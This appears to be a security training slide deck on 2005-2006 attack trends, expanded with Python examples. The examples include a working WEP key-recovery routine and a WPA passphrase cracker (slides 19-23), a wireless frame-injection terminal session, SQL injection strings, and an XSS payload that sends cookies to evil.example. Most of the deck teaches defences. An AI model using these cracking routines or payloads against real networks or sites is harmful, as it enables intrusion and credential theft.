
Attack Trends 2005-2006 Presented by: Dani Firman Syah.



2 Attack Trends
- Spyware
- DoS (Denial of Service) attacks
- Wireless attacks
- Phishing (pronounced "fishing")
- Spam
- Web attacks

3 A. Spyware
Spyware = a rogue application, installed silently, whose business is pushing product advertising through banners and tracking what the user does.
Spyware activity:
- Monitors browsing activity and pops up banners.
- Records keyboard activity; sometimes acts as an e-mail logger (keylogger).
Impact:
- Performance
- Privacy
- Security risk

4 Spyware Defense
- Check that an application you are about to install is not a known spyware package. A spyware list is available at http://www.surasoft.com/spywaredb/
- Do not install applications of unclear origin.
- Use anti-spyware software, e.g. Ad-aware.
- RTFM (Read The FAQs & Manual): read the EULA (End User License Agreement) of the application you are about to install carefully; bundled "tracking" components are often disclosed only there.
- Use a firewall to detect outbound connections whose origin you do not recognise; a host firewall that alerts on new outbound connections catches the tracking and banner traffic spyware generates.

5 B. DoS & DDoS
DoS (Denial of Service), DDoS (Distributed Denial of Service)
DoS = flooding a target with packets over TCP/IP services (victim: a network, a host, an application or a system).
DDoS = a DoS attack carried out at scale from many different hosts (usually compromised machines under one attacker's control) against a single target/victim.

6 DoS & DDoS Tools
- TFN (Tribe Flood Network)
- Trin00
- TFN2K (TFN with encryption, making it harder to detect; Targa3 is a newer DoS attack tool)
- Stacheldraht (combines Trin00's and TFN's technology)

7 TCP/IP Three-Way Handshake
COMPUTER A -> COMPUTER B: SYN, ISN A
COMPUTER B -> COMPUTER A: ACK (ISN A + 1), SYN, ISN B
COMPUTER A -> COMPUTER B: ACK (ISN B + 1)
Connection established (ACK, Data)

8 Spoofing & DoS
Attacker -> Computer B: SYN (source address spoofed as A, ISN A)
Computer B -> Computer A: ACK (ISN A + 1), SYN (B, ISN B)
Computer A -> Computer B: RST!!! (A never sent a SYN, so it resets the half-open connection B has allocated)

9 SYN Flood / Smurf Attack (Spoofing Act)
Attacker -> Computer B: SYN (source spoofed as A, ISN A), repeated at a high rate
Computer B -> Computer A: ACK (ISN A + 1), SYN (B, ISN B), one per spoofed SYN
Computer A never completes the handshake (if the spoofed source is unreachable, not even an RST comes back), so B's half-open connection queue fills up and real clients are refused: DIE!!! (SYN FLOOD)
Note: a Smurf attack is a different spoofing attack: ICMP echo requests sent to a broadcast address with the victim's address as source, so every host on that segment floods the victim with replies.
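The slide's "queue fills up" claim, as a runnable simulation added here (this is illustration code, not the presenter's): a listener with a bounded half-open queue receives 1000 SYNs from spoofed, unreachable sources and then one genuine client; the same flood is then run against a listener that uses SYN cookies, a standard mitigation the slides do not cover. Queue size, timeout, addresses and the cookie secret are constructed values.

```python
import hashlib
import hmac

BACKLOG = 8            # constructed: tiny half-open queue so the effect is visible
SYN_TIMEOUT = 30.0     # constructed: seconds a half-open entry lives before eviction


def _isn_for(src):
    # deterministic stand-in for the kernel's ISN generator
    return int.from_bytes(hashlib.sha256(repr(src).encode()).digest()[:4], "big")


class StatefulServer:
    """Classic listener: every SYN allocates a slot in the SYN_RCVD queue that
    is freed only by the client's ACK, an RST, or a timeout."""

    def __init__(self):
        self.half_open = {}        # (src_ip, src_port) -> (isn_b, expiry)
        self.established = set()
        self.dropped_syns = 0

    def on_syn(self, src, now):
        self.half_open = {k: v for k, v in self.half_open.items() if v[1] > now}
        if len(self.half_open) >= BACKLOG:
            self.dropped_syns += 1
            return None            # queue full: SYN silently dropped
        isn_b = _isn_for(src)
        self.half_open[src] = (isn_b, now + SYN_TIMEOUT)
        return isn_b               # sent back in the SYN/ACK

    def on_ack(self, src, ack_num, now):
        entry = self.half_open.pop(src, None)
        if entry is not None and (entry[0] + 1) & 0xFFFFFFFF == ack_num:
            self.established.add(src)
            return True
        return False


class SynCookieServer:
    """SYN cookies: no state per SYN. The ISN is a MAC over the connection's
    4-tuple and a coarse timestamp, so a valid ACK proves the client received
    the SYN/ACK; spoofed, unreachable sources cost the server nothing."""

    def __init__(self, secret=b"constructed-secret"):
        self.secret = secret
        self.established = set()
        self.dropped_syns = 0      # stays 0: there is no queue to fill

    def _cookie(self, src, now):
        t = int(now) // 64        # limits how long a cookie stays valid
        msg = f"{src}|{t}".encode()
        return int.from_bytes(hmac.new(self.secret, msg, hashlib.sha256).digest()[:4], "big")

    def on_syn(self, src, now):
        return self._cookie(src, now)

    def on_ack(self, src, ack_num, now):
        if (self._cookie(src, now) + 1) & 0xFFFFFFFF == ack_num:
            self.established.add(src)
            return True
        return False


def run_flood(server, spoofed_syns=1000, legit_delay=1.0, now=0.0):
    """Attacker sends SYNs from spoofed, unreachable sources (their SYN/ACKs go
    nowhere, so neither an ACK nor an RST ever arrives). A legitimate client
    then connects legit_delay seconds later. Returns True if it gets through."""
    for i in range(spoofed_syns):
        src = (f"10.{(i >> 8) & 255}.{i & 255}.{i % 7 + 1}", 40000 + i)
        server.on_syn(src, now)
    legit = ("192.0.2.10", 51515)
    isn = server.on_syn(legit, now + legit_delay)
    if isn is None:
        return False               # denial of service
    return server.on_ack(legit, (isn + 1) & 0xFFFFFFFF, now + legit_delay)


if __name__ == "__main__":
    print("stateful listener during flood :", run_flood(StatefulServer()))
    print("stateful listener after timeout:", run_flood(StatefulServer(), legit_delay=31.0))
    print("SYN-cookie listener during flood:", run_flood(SynCookieServer()))
```

The stateful listener recovers only once the half-open entries time out, which is exactly the window the attacker keeps refilling; shortening the timeout or enlarging the backlog just moves the threshold, whereas cookies remove the per-SYN state altogether.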

10 TCP-IP Injection


12 DoS & DDoS Mitigation
- The simplest measure is to change the IP (Internet Protocol) address that is the DoS/DDoS target.
- Remove the route to the targeted IP at the gateway/router (null-route it, sacrificing that one address so the rest of the network stays reachable).
- Filter attack signatures with the firewall to deny abnormal packets (zero data size, large UDP & ICMP packets). Firewalls such as iptables, PF (packet filter), ipfw, Check Point and Cisco PIX can deny packets that match such signatures.
- Allow only the first UDP & ICMP packet from a source and ignore the rest until a timeout expires (rate limiting).

13 C. Wireless Attack
Various wireless attacks:
a. Surveillance attack (war driving or net stumbling)
b. Rogue access point attack
c. Jamming (denial of service) attack
d. Cracking WEP (IV collisions, FMS, KoreK, ChopChop)
e. WPA dictionary attack
f. Wireless injection attack

14 Wireless Attack Tools
Netstumbler (Windows GUI), Wellenreiter (Linux GUI), AirSnort, Kismet, Aircrack, WEPCrack, AiroPeek, coWPAtty, etc.

15 Surveillance Attack

16 War Driving

17 Rogue Access Point

18 Jamming (Denial of Service)
Direct Sequence Spread Spectrum (DSSS) channel overlap: in the 2.4 GHz band only channels 1, 6 and 11 do not overlap, so a transmitter on any neighbouring channel interferes with them.

19 WEP Cracking
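The FMS attack named on slide 13, simulated end to end as an added example (this is illustration code written for this page, not the presenter's or any tool's). It builds WEP frames under a constructed 40-bit key, keeps the "weak" IVs of the form (A+3, 255, X), and recovers the key one byte at a time from the first keystream byte, which is known because every 802.11 data frame starts with the LLC/SNAP byte 0xAA. Roughly 5% of weak IVs vote for the right byte and the rest vote at random, so with only the 256 weak IVs per byte used here the plurality occasionally misses; real attacks collect hundreds of thousands of frames for that reason.

```python
from collections import Counter

SNAP_FIRST_BYTE = 0xAA   # every WEP data frame starts with the LLC/SNAP byte 0xAA


def rc4_ksa(key):
    """RC4 key scheduling: returns the 256-entry permutation S."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    return S


def rc4_keystream(key, n):
    S = rc4_ksa(key)
    i = j = 0
    out = bytearray()
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def rc4(key, data):
    return bytes(a ^ b for a, b in zip(data, rc4_keystream(key, len(data))))


def wep_encrypt(secret, iv, plaintext):
    """WEP: per-frame RC4 key = IV (3 bytes, sent in the clear) || secret key.
    The CRC-32 ICV is omitted; FMS only needs the first ciphertext byte."""
    return iv, rc4(bytes(iv) + secret, plaintext)


def fms_guess(iv, known, first_ks_byte):
    """One vote for key byte A = len(known) from a frame whose IV is 'resolved'
    after the first A+3 KSA steps (those steps use only the IV and the key
    bytes already recovered). Returns None if the IV is not resolved."""
    A = len(known)
    K = list(iv) + list(known)
    S = list(range(256))
    j = 0
    for i in range(A + 3):
        j = (j + S[i] + K[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
    # resolved condition: the first PRGA output byte will be S[A+3], unless a
    # later KSA step disturbs position 0, 1 or A+3 (about 5% of the time none does)
    if S[1] >= A + 3 or (S[1] + S[S[1]]) & 0xFF != A + 3:
        return None
    # step A+3 sets S[A+3] = S[j + S[A+3] + K[A+3]]; solve for K[A+3]
    return (S.index(first_ks_byte) - j - S[A + 3]) & 0xFF


def recover_key(packets, key_len=5):
    """packets: iterable of (iv, ciphertext). Recovers the secret byte by byte
    from the weak IVs (A+3, 255, X) with a plurality vote."""
    known = []
    for A in range(key_len):
        votes = Counter()
        for iv, ct in packets:
            if iv[0] != A + 3 or iv[1] != 0xFF:
                continue
            g = fms_guess(iv, known, ct[0] ^ SNAP_FIRST_BYTE)
            if g is not None:
                votes[g] += 1
        known.append(votes.most_common(1)[0][0] if votes else 0)
    return bytes(known)


def weak_iv_capture(secret, key_len=5):
    """Constructed 'capture': one frame for every weak IV (A+3, 255, X)."""
    frame = bytes([SNAP_FIRST_BYTE, 0xAA, 0x03, 0, 0, 0, 0x08, 0x00]) + b"constructed payload"
    return [wep_encrypt(secret, (A + 3, 0xFF, X), frame)
            for A in range(key_len) for X in range(256)]


def weak_iv_hits(secret, A):
    """How many of the 256 weak IVs for byte A vote for the true byte once the
    earlier bytes are known; about 5% (around 13) is the expected yield."""
    hits = 0
    for iv, ct in weak_iv_capture(secret):
        if iv[0] == A + 3 and fms_guess(iv, secret[:A], ct[0] ^ SNAP_FIRST_BYTE) == secret[A]:
            hits += 1
    return hits


KEY = bytes.fromhex("1f2a3b4c5d")   # constructed 40-bit WEP key

if __name__ == "__main__":
    capture = weak_iv_capture(KEY)
    print("weak-IV frames:", len(capture))
    print("recovered:", recover_key(capture).hex(), " true:", KEY.hex())
```

The attack only ever runs the first A+3 steps of the key schedule per frame, which is why it is cheap: the cost is in collecting frames, not in computing. Filtering weak IVs on the AP side does not help against the later KoreK and ChopChop attacks, which is why slide 28's advice below is to stop relying on WEP.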

20 WPA Dictionary Attack (1)

21 WPA Dictionary Attack (2)

22 WPA Dictionary Attack (3)

23 WPA Dictionary Attack (4)
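The four WPA dictionary-attack slides above have no transcript, so here is the attack they illustrate, written for this page as an added example (not the presenter's code or coWPAtty's). The PMK, PTK and MIC derivations follow IEEE 802.11i: everything needed to verify a candidate passphrase is in the captured four-way handshake, so the attack runs entirely offline. The SSID and AP MAC are taken from the scan output on slide 24; the client MAC, nonces, EAPOL frame bytes, true passphrase and wordlist are constructed.

```python
import hashlib
import hmac


def pmk_from_passphrase(passphrase, ssid):
    """PSK/PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    The 4096 iterations are what makes each candidate cost ~8192 HMACs."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key, label, data, nbytes):
    """802.11i PRF-n: concatenated HMAC-SHA1(key, label || 0x00 || data || i)."""
    out = b""
    for i in range((nbytes + 19) // 20):
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:nbytes]


def ptk_from_pmk(pmk, aa, spa, anonce, snonce):
    """PTK = PRF-512(PMK, "Pairwise key expansion", min/max of the MACs and nonces).
    Its first 16 bytes are the KCK, the key that authenticates EAPOL-Key frames."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 64)


def eapol_mic(kck, eapol_zeroed, keyver=2):
    """MIC over the EAPOL-Key frame with its MIC field zeroed:
    key descriptor version 1 (TKIP) = HMAC-MD5, version 2 (CCMP) = HMAC-SHA1[0:16]."""
    if keyver == 1:
        return hmac.new(kck, eapol_zeroed, hashlib.md5).digest()
    return hmac.new(kck, eapol_zeroed, hashlib.sha1).digest()[:16]


def crack(ssid, aa, spa, anonce, snonce, eapol_zeroed, mic, wordlist, keyver=2):
    """Try each candidate against the MIC of handshake message 2."""
    for word in wordlist:
        if not 8 <= len(word) <= 63:
            continue                       # outside the WPA passphrase length range
        kck = ptk_from_pmk(pmk_from_passphrase(word, ssid), aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_zeroed, keyver), mic):
            return word
    return None


# --- constructed handshake "capture" (not from a real network) ---
SSID = "linksys"
AA = bytes.fromhex("00131030324b")              # AP MAC from slide 24's scan output
SPA = bytes.fromhex("00e04c112233")             # constructed client MAC
ANONCE = hashlib.sha256(b"constructed anonce").digest()
SNONCE = hashlib.sha256(b"constructed snonce").digest()
# EAPOL-Key message 2 with its MIC field zeroed; the header bytes are stand-ins
EAPOL_ZEROED = (bytes.fromhex("0103007502010a000000000000000000000001")
                + SNONCE + bytes(16) + bytes(16) + bytes(2))
TRUE_PASSPHRASE = "correct horse"               # constructed
CAPTURED_MIC = eapol_mic(
    ptk_from_pmk(pmk_from_passphrase(TRUE_PASSPHRASE, SSID), AA, SPA, ANONCE, SNONCE)[:16],
    EAPOL_ZEROED)
WORDLIST = ["password", "linksys", "12345678", "short", "correct horse", "letmein1"]


def demo():
    return crack(SSID, AA, SPA, ANONCE, SNONCE, EAPOL_ZEROED, CAPTURED_MIC, WORDLIST)


if __name__ == "__main__":
    print("recovered passphrase:", demo())
```

Because the SSID is the PBKDF2 salt, an attacker can precompute PMKs for common SSIDs such as "linksys" (slide 24) and skip the expensive step entirely; a non-default SSID plus a long random passphrase is what defeats this attack, not SSID hiding.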

24 Wireless Injection
root@wifisecurity:~# iwlist ath0 scan
ath1      Scan completed :
          Cell 01 - Address: 00:13:10:30:32:4B
                    ESSID:"linksys"
                    Mode:Master
                    Encryption key:off
                    Frequency:2.452 GHz (Channel 9)
                    Quality:43/0  Signal level:-28 dBm  Noise level:-41 dBm
root@wifisecurity:~# iwconfig ath1 mode monitor channel 9
root@wifisecurity:~# ifconfig ath1 promisc
root@wifisecurity:~# wifiinject -b 00:13:10:30:32:4B -i ath1 -p -o ath1
IN_IFACE: ath1
OUT_IFACE: ath1
BSSID: 00:13:10:30:32:4B
tcpdump: WARNING: ath1: no IPv4 address assigned
Interface wj0 created. Configure it and use it
root@wifisecurity:~# ifconfig wj0 192.168.2.110 mtu 1400
root@wifisecurity:~# ping 192.168.2.100
PING 192.168.2.100 (192.168.2.100): 56 data bytes
64 bytes from 192.168.2.100: icmp_seq=2 ttl=64 time=0.188 ms
64 bytes from 192.168.2.100: icmp_seq=3 ttl=64 time=0.206 ms
.......
The target network is open (Encryption key:off); the injection tool exposes a virtual interface wj0 through which the attacker's host sends frames carrying the AP's BSSID, and the ping shows it reaching a client on the WLAN.

25 Securing The Wireless Network
a) Secure SSID, MAC filtering, WEP/WPA
b) Wireless gateway for wireless protection (captive portal: NoCatAuth, WiFiDog, hostapd + FreeRADIUS)
c) VPN for securing the wireless network
d) Monitoring: Fake AP, wireless honeypot, arpwatch

26 Securing SSID
Change the default SSID (Service Set Identifier) to one that is not easily guessed (a mix of letters and digits) and use the maximum SSID length. This only stops casual scanners from recognising the AP by name: the SSID travels in the clear in beacons and probe responses, so it is not a secret and offers no protection against the tools on slide 14.

27 MAC Filtering
Configure MAC (Media Access Control) address filtering on the AP (access point): only wireless clients whose MAC is registered can connect to the AP. A MAC address is 48 bits: the first 24 bits (3 octets) are the vendor code (OUI), the remaining 24 bits are the interface's serial number. Example: 00-10-4b = vendor 3Com. Caveat: every frame carries the MAC in the clear, and a sniffer plus `ifconfig <iface> hw ether <mac>` lets an attacker clone an allowed client's address, so treat filtering as housekeeping, not access control.

28 WEP Security
Protection with WEP (Wired Equivalent Privacy). WEP key = 64-bit or 128-bit, of which 24 bits are the per-frame IV sent in the clear, so the secret is only 40 or 104 bits. Both sizes fall to the IV/FMS/KoreK/ChopChop attacks listed on slide 13; use WEP only where nothing better is available, and then behind a VPN (slide 32).

29 Wireless Gateway (1)

30 Wireless Gateway (2)
NoCatAuth; hostapd + open-source captive portal (http://hostap.epitest.fi/hostapd); FreeRADIUS (http://freeradius.org); ChilliSpot

31 Captive Portal

32 Securing the WLAN with VPN

33 Monitoring the WLAN
Fake AP (fake access point generator), wireless honeypot, WIDS (wireless intrusion detection system), arpwatch

34 Fake AP
Black Alchemy Weapons Lab (http://www.blackalchemy.to/project/fakeap/). Used as part of a honeypot; Fake AP runs on Linux and *BSD using Prism2/2.5/3-based 802.11b cards with the Host AP driver for Intersil Prism2/2.5/3.

35 Wireless Honeypot (1)
HONEYPOT CONFIGURATION: FOR LINKSYS WRT54 ACCESS POINT (honeyd template)
create linksys
set linksys personality "Linux Kernel 2.4.0 - 2.5.20"
add linksys tcp port 80 "/bin/sh scripts/fakelinksys.sh"
add linksys udp port 53 open
add linksys udp port 67 open
add linksys udp port 69 open
set linksys default tcp action reset
bind 192.168.1.1 linksys

36 Wireless Honeypot (2) FILE: fakelinksys.sh #!/bin/sh DATE=`date` echo "== Httpd break-in attempt [$DATE] ==" >> /tmp/linksys.log while read request do LINE=`echo "$request" | egrep -i "[a-z:]"` if [ -z "$LINE" ] then break fi echo "$request" >> /tmp/linksys.log done echo "==" >> /tmp/linksys.log cat << _eof_ HTTP/1.0 401 Unauthorized Server: httpd Date: $DATE WWW-Authenticate: Basic realm="WRT54G" Content-Type: text/html Connection: close 401 Unauthorized Authorization required. _eof_

37 ARP Watch

38 D. Phishing
Phishing = "fishing": the victim is led to the URL of a fake web site built to look like the genuine one. The lure arrives as a forged (fake/spoofed) e-mail. The fake site usually carries a virus or trojan, or harvests information to the victim's loss (credentials, card numbers). Phishing often fools the victim through browser bugs known as misleading URLs & HTML links (at the time, bugs in the IE browser).
Example: http://www.friendly.com%01@www.evil.com/friendly/index.html (misleading URL: everything before the @ is userinfo, the real host is www.evil.com, and old IE stopped displaying the address at the %01 byte). www.friendly.com shown as the visible text of a link whose href points elsewhere (misleading HTML link).
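The two tricks on this slide, checked the way a phishing filter would check them, as an added example written for this page (not the presenter's code): the host the browser will actually contact is compared with what the user is shown, and the userinfo and control-character tricks are flagged. The URLs and link texts are the slide's, plus constructed clean ones.

```python
import re
from urllib.parse import urlsplit, unquote

CONTROL_ESCAPE = re.compile(r"%[01][0-9a-fA-F]")            # %00..%1f
HOST_IN_TEXT = re.compile(r"(?:https?://)?([a-z0-9-]+(?:\.[a-z0-9-]+)+)", re.I)


def real_host(url):
    """Host the browser connects to. In http://www.friendly.com%01@www.evil.com/
    everything before '@' is the userinfo part of the authority, not a host."""
    return (urlsplit(url).hostname or "").lower()


def suspicious(url, link_text=None):
    """Return the list of reasons this link is misleading (empty = nothing found)."""
    reasons = []
    authority = urlsplit(url).netloc
    if "@" in authority:
        userinfo = authority.rsplit("@", 1)[0]
        reasons.append(f"userinfo '{unquote(userinfo)}' in front of real host {real_host(url)}")
    if CONTROL_ESCAPE.search(url):
        reasons.append("control-character escape in URL (display truncation trick)")
    if link_text:
        m = HOST_IN_TEXT.search(link_text)
        if m and m.group(1).lower() != real_host(url):
            reasons.append(f"link text shows {m.group(1)} but target host is {real_host(url)}")
    return reasons


# constructed links as they might appear in a lure and in a genuine mail
LINKS = [
    ("http://www.friendly.com%01@www.evil.com/friendly/index.html", "www.friendly.com"),  # slide's example
    ("http://www.evil.com/login", "https://www.friendly.com/login"),                      # misleading HTML link
    ("https://www.friendly.com/index.html", "www.friendly.com"),                          # honest link
]


def report(links=LINKS):
    return {url: suspicious(url, text) for url, text in links}


if __name__ == "__main__":
    for url, reasons in report().items():
        print(url, "->", reasons or "ok")
```

Plain-text mail (slide 45) removes the third trick entirely: without HTML there is no separate link text, so the user sees the same string the browser will open.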

39 Phishing Example


45 Phishing Defense
- Upgrade, patch and fix your IE browser with the latest hotfixes from Microsoft Windows Update (http://windowsupdate.microsoft.com).
- Use a non-IE browser: Opera, Mozilla, Firefox, Konqueror, Camino (Mac).
- Disable HTML mode in your e-mail client and use plain-text e-mail, so the link text the user reads cannot differ from the real target.

46 E. SPAM
SPAM is e-mail that typically carries advertising, product, service and other information the mailbox owner never asked for. Spammers harvest addresses from information published on the Internet (web pages, white pages, yellow pages, search engines, etc.). SPAM is frequently the vehicle by which viruses spread on the Internet. Uncontrolled SPAM raises network traffic and can create a bottleneck on the network.

47 Blocking SPAM
- Install anti-spam e-mail software (SpamAssassin, Bogofilter, Razor, Pyzor, GFI MailEssentials, etc.).
- Use an anti-virus on the e-mail server (McAfee, Symantec AV, Amavis, MIMEDefang, Kaspersky AV, Norman AV).
- Run e-mail blacklist/blocklist facilities (e.g. Exchange block lists, spfilter). Several blacklist (DNSBL) providers can be used to block spam:
  - relays.ordb.org
  - relays.visi.com
  - bl.spamcop.net
  - blackholes.wirehub.net
  - list.dsbl.org
  Check that a list still operates before relying on it: a list that has shut down either silently stops matching or, worse, starts answering "listed" for every query and blocks all incoming mail.
- Use a frontend/backend topology (two or more MTAs, with the frontend server acting as the filtering machine).
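How the blocklist lookup on this slide actually works, as an added example written for this page (not the presenter's or any MTA's code): the connecting client's IPv4 address is reversed and queried under the list's zone, an A record in 127.0.0.0/8 means "listed", and each zone is sanity-checked the way RFC 5782 prescribes before its answers are trusted. Two zone names are taken from the slide; the resolver is a constructed stub so the code runs offline, and the Received: lines and addresses are constructed.

```python
import ipaddress
import re

ZONES = ["bl.spamcop.net", "list.dsbl.org"]              # two of the zones named on the slide
LISTED_RANGE = ipaddress.IPv4Network("127.0.0.0/8")      # DNSBL "listed" answers live here


def dnsbl_name(ip, zone):
    """198.51.100.4 under bl.spamcop.net -> 4.100.51.198.bl.spamcop.net"""
    octets = str(ipaddress.IPv4Address(ip)).split(".")
    return ".".join(reversed(octets)) + "." + zone


def is_listed(ip, zone, resolve):
    """resolve(name) returns the A records as strings, [] for NXDOMAIN."""
    return any(ipaddress.IPv4Address(a) in LISTED_RANGE for a in resolve(dnsbl_name(ip, zone)))


def zone_healthy(zone, resolve):
    """RFC 5782 test: 127.0.0.2 must be listed and 127.0.0.1 must not be.
    A shut-down list that answers 'listed' to everything, or one that has gone
    dark, fails this and must be dropped from the configuration."""
    return is_listed("127.0.0.2", zone, resolve) and not is_listed("127.0.0.1", zone, resolve)


def connecting_ip(received_header):
    """The client address is the bracketed IP in the Received: line our own MX
    wrote; lines added by earlier hops are attacker-controlled and ignored."""
    m = re.search(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]", received_header)
    return m.group(1) if m else None


def verdict(received_header, resolve, zones=ZONES):
    ip = connecting_ip(received_header)
    if ip is None:
        return "accept"
    for zone in zones:
        if zone_healthy(zone, resolve) and is_listed(ip, zone, resolve):
            return f"reject: {ip} listed in {zone}"
    return "accept"


# --- constructed resolver stub (no network access) ---
_ANSWERS = {
    "2.0.0.127.bl.spamcop.net": ["127.0.0.2"],
    "2.0.0.127.list.dsbl.org": ["127.0.0.2"],
    "4.100.51.198.bl.spamcop.net": ["127.0.0.2"],         # the open relay in our sample
}


def stub_resolve(name):
    if name.endswith(".dead.example"):                    # constructed defunct list: 'listed' for every query
        return ["127.0.0.2"]
    return _ANSWERS.get(name, [])


SAMPLE_SPAM = "Received: from mx.badrelay.example (mx.badrelay.example [198.51.100.4]) by mx.local with SMTP"
SAMPLE_HAM = "Received: from mail.partner.example (mail.partner.example [203.0.113.7]) by mx.local with SMTP"

if __name__ == "__main__":
    print(verdict(SAMPLE_SPAM, stub_resolve))
    print(verdict(SAMPLE_HAM, stub_resolve))
    print("dead list usable:", zone_healthy("dead.example", stub_resolve))
```

In production the health check runs periodically rather than per message, and the lookup happens at SMTP time against the connecting socket address, not against headers parsed after acceptance; the header form is used here only so the example has input to read.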

48 F. Web Attacks
- Parameter manipulation (CGI command execution, Unicode/URL decoding)
- Buffer overflow (.ida/.idq overflow, ISAPI printer overflow, WebDAV overflow; WebDAV = Web-based Distributed Authoring and Versioning)
- Cross-site scripting (XSS)
- SQL injection
- Session/cookie hijacking & manipulation
© Dani Firman Syah, Xnuxer Security, Email: xnuxer@yahoo.com

49 Parameter Manipulation

50 SQL Injections
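The SQL injection slide has no transcript; this added example (written for this page, not the presenter's code) shows the attack and the fix side by side against an in-memory SQLite database. The table, users and passwords are constructed, and passwords are stored in clear only to keep the example short; a real system stores salted hashes.

```python
import sqlite3


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT, is_admin INTEGER)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [("alice", "s3cret", 0), ("admin", "hunter2-long-random", 1)])
    return db


def login_vulnerable(db, username, password):
    """User input is pasted into the statement, so quotes and '--' in the
    input become SQL syntax instead of data."""
    sql = (f"SELECT username FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(db, username, password):
    """Placeholders: the driver hands the values to SQLite separately from the
    statement text, so they can never be re-parsed as SQL."""
    row = db.execute("SELECT username FROM users WHERE username = ? AND password = ?",
                     (username, password)).fetchone()
    return row[0] if row else None


# constructed attacker inputs
COMMENT_OUT_PASSWORD = "admin' --"        # closes the string, comments out the password check
ALWAYS_TRUE = "' OR '1'='1"               # AND binds tighter than OR, so the WHERE matches every row


def demo():
    db = make_db()
    return {
        "vulnerable, comment trick": login_vulnerable(db, COMMENT_OUT_PASSWORD, "anything"),
        "vulnerable, tautology":     login_vulnerable(db, "nobody", ALWAYS_TRUE),
        "safe, comment trick":       login_safe(db, COMMENT_OUT_PASSWORD, "anything"),
        "safe, tautology":           login_safe(db, "nobody", ALWAYS_TRUE),
        "safe, real credentials":    login_safe(db, "alice", "s3cret"),
    }


if __name__ == "__main__":
    for case, result in demo().items():
        print(f"{case:28s} -> {result}")
```

"Filter variables" on slide 52 is necessary but not sufficient: escaping quotes by hand is bypassed by encodings the filter did not anticipate, whereas parameterised statements make the separation between code and data structural.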

51 Cross Site Scripting
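The cross-site scripting slide likewise has no transcript; this added example (written for this page, not the presenter's code) renders a search result page that reflects the query, first unescaped and then with HTML escaping, and checks whether two classic payloads survive in the element body and in an attribute value. The page template and payloads are constructed.

```python
import html


def render_vulnerable(query):
    """Reflects the query into both an element body and an attribute value."""
    return f'<p>Results for: {query}</p><input name="q" value="{query}">'


def render_safe(query):
    """Same template; html.escape(quote=True) encodes & < > " and ', which
    covers both the text context and the double-quoted attribute context."""
    q = html.escape(query, quote=True)
    return f'<p>Results for: {q}</p><input name="q" value="{q}">'


# constructed payloads
PAYLOAD_TAG = '<script>document.location="http://evil.example/?c="+document.cookie</script>'
PAYLOAD_ATTR = '" onfocus="alert(1)" autofocus="'   # breaks out of value="..." without any <


def contains_executable(markup):
    """Crude oracle for the example: a live <script> tag or an event handler
    attribute that escaped the attribute value."""
    lower = markup.lower()
    return "<script" in lower or ' onfocus="' in lower


def demo():
    return {
        "vulnerable/tag":  contains_executable(render_vulnerable(PAYLOAD_TAG)),
        "vulnerable/attr": contains_executable(render_vulnerable(PAYLOAD_ATTR)),
        "safe/tag":        contains_executable(render_safe(PAYLOAD_TAG)),
        "safe/attr":       contains_executable(render_safe(PAYLOAD_ATTR)),
    }


if __name__ == "__main__":
    for case, executable in demo().items():
        print(f"{case:16s} script survives: {executable}")
    print(render_safe(PAYLOAD_ATTR))
```

The second payload matters because "filter out <script>" style blacklists miss it entirely: no angle bracket is needed once the input lands inside an attribute. Escaping must be chosen for the context the value is written into; an unquoted attribute or a JavaScript string would need different encoding again.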

52 Securing The Web
- Use a hardened web server.
- Install the latest patches and hotfixes.
- Install IIS Lockdown on IIS web servers.
- Secure the code: validate and filter every input variable, use parameterised queries, and encode output for the context it is written into.
- Use a filtering device (deny packets with illegal TCP/IP signatures).
- Use SSL (Secure Sockets Layer) for secure data transactions.

53 Questions?

